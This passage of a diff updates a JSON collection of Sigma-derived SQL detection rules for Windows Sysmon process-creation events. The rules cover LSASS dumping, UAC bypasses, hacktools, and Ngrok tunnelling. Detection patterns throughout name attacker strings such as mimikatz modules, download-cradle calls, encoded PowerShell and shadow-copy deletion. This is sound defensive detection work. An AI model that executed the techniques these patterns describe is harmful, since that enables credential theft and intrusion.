CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { "title": "UAC Bypass via Event Viewer", 
@@ -14147,9757 +13759,9596 @@ "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Administrative activity" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": 
"7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "status": "experimental", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "status": "experimental", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 
"attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Programs that use the same command line flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or 
detection evasion", - "author": "Florian Roth (Nextron Systems)", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "status": "experimental", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "title": "HTML Help HH.EXE Suspicious 
Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\hh.exe' ESCAPE '\\' AND (Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - 
"filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE 
'%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "status": "test", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine 
LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "FQDNs that start with a number" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR 
